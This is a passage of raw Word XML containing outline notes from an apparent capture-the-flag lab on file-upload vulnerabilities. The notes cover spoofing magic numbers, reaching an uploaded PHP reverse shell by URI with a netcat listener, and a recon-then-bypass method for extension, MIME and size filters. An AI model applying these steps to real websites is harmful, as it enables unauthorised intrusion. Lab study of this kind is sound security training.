        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Open file to write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D8DC1E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Add four random letters on first line (AAAA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31812724" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Save and exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C76B6A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reopen file in hexeditor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7770AB74" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">AAAA </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> 41 41 41 41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386E7B33" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Change to HEX of magic numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01792953" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Save and exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203307CE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“file” command to spoof file type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BF3B95" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Access shell directly using URI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235DAEFE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Assume directory and attach file name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0EF8A0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. magic.uploadvulns.thm/graphics/php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4564EE5D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Interface with netcat listening post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C193043" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D5D694E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>EXAMPLE METHODOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039DD5EB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Take a look at the website as a whole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59244028" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Wappalyzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE29AD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Indicators of what languages and frameworks the web application might have been built with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4051C84F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Make request to website (refresh) and intercept with Burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7E5F36" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37174C4C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Server, x-powered-by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D6C37F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Look for vectors of attack such as an upload page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3116A858" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>After finding an upload page, inspect further</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D44FD34" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Look at source code for client-side scripts to determine their presence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB2876F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>First stage of bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E029B78" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Attempt completely innocent file upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251324E2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Look to see how file is accessed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7AC738" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Directly?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03399660" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Embedded in page?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534A8AFC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Website naming scheme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC2C288" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Gobuster enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ADDC35" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Determine baseline accepted file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE5C063" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Gobuster -x switch – look for files with specific extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C12555B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. -x php,txt,html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76615128" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Helpful if server is changing names of files being uploaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E736837" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>After determining file upload and storage process, attempt malicious file upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C71C30B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bypass client-side filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33547EA0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>When stopped by server-side filter, error messages can assist in determining issue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8A7CE4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">If file can be uploaded with nonexistent extension type </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> server using blacklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE61C95" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If upload fails, extension filters will be using a whitelist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E34D3C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Try re-uploading innocent item with magic numbers changed to reflect an expected filtered upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1316A6C1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">If rejected </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> server using magic number filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6707F72E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Upload innocent file but intercept request with Burpsuite and change MIME type to something likely filtered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A27AF9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">If rejected </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> server filtering based on MIME types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F54856F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumerating file length filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188FF182" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Uploading small files versus large files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6530B734" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Progressive overload to determine cutoff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F141D3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
